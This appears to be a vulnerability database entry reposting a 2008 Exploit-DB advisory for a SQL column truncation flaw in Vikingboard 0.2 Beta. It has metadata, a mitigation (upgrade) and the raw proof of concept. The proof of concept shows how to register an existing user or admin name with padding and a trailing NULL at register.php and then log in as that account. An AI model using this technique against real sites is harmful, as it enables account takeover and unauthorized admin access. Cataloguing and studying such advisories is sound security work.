Vikingboard - exploit.company

vendor:

Vikingboard

by:

StAkeR

7.5

CVSS

HIGH

SQL Column Truncation

CWE

Product Name: Vikingboard

Affected Version From: 0.2 Beta

Affected Version To: 0.2 Beta

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Vikingboard <= 0.2 Beta SQL Column Truncation

A vulnerability in Vikingboard <= 0.2 Beta allows an attacker to register an user/admin that already exists. This is done by sending a specially crafted request to the upload/register.php page with a NULL value for the username field. An attacker can then use the same credentials to log in to the upload/login.php page.

Mitigation:

Upgrade to the latest version of Vikingboard.

Source

Exploit-DB raw data:

---------------------------------------------------------------------
 Vikingboard <= 0.2 Beta SQL Column Truncation
---------------------------------------------------------------------
 Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
 Discovered On: 25/09/2008
---------------------------------------------------------------------
 You Can Register An User\Admin That Already Exists!
---------------------------------------------------------------------
 URL: upload/register.php
 
 Username: [username]                                            NULL
 Password: [password]
 E-Mail:   [E-Mail]
---------------------------------------------------------------------
 URL: upload/login.php
 
 Username: [username]
 Password: [password]
---------------------------------------------------------------------

# milw0rm.com [2008-09-25]